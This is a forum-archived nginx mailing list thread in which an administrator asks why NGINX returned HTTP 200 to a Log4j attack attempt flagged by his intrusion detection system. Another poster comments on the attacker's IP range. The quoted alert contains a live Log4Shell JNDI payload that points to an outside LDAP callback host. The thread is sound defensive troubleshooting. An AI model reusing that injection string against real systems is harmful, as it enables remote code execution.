Welcome! Log In Create A New Profile

Advanced

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici
December 29, 2021 12:22PM
Thank you very much for your reply. I really appreciated it.
I’ll wait for the final gurus feedback too.

Mauro

> On 29 Dec 2021, at 18:03, lists <lists@lazygranch.com> wrote:
>
> That IP space is certified shady. I detect the occasional hack from them. See
>
> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/
>
> and
>
> https://wirelessdataspco.org/faq.php
>
> These wireless companies will do anything for money including leasing their IP space.
>
> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them.
>
> I will leave it up to the gurus to parse the log.
>
>
>
>
>
>
> Original Message
>
>
> From: mauro.tridici@cmcc.it
> Sent: December 29, 2021 6:55 AM
> To: nginx@nginx.org
> Reply-to: nginx@nginx.org
> Subject: Help request about Log4j attack attempts and NGINX logs meaning
>
>
>
>
> Dear Users,
>
>
> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform.
> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks.
> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.
>
>
> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts.
> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was “HTTP/1.1 200” and I’m very worried about it.
> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.
>
>
> Could you please help me to understand the reason why the NGINX server answer was “HTTP/1.1 200”!?
>
>
> You can see below the mail notification I received:
>
>
>
> Attack Notification.
> 2021 Dec 28 20:45:59
>
> Received From: “hidden_NGINX_server_IP” >/var/log/nginx/access.log
> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
> Src IP: 166.137.252.110
> Portion of the log(s):
>
> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
>
>
> Thank you in advance,
> Mauro
> _______________________________________________
> nginx mailing list
> nginx@nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx


_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Subject Author Posted

Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 09:56AM

Re: Help request about Log4j attack attempts and NGINX logs meaning

gariac December 29, 2021 12:06PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 12:22PM

Re: [EXTERNAL] Re: Help request about Log4j attack attempts and NGINX logs meaning

Slaughter, Justin D December 29, 2021 01:14PM

Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 01:32PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Maxim Dounin December 29, 2021 01:32PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 29, 2021 01:36PM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Maxim Konovalov December 30, 2021 02:22AM

Re: Help request about Log4j attack attempts and NGINX logs meaning

Mauro Tridici December 30, 2021 03:26AM

Re: Help request about Log4j attack attempts and NGINX logs meaning

gariac December 30, 2021 04:22AM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 127
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 421 on December 02, 2018
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready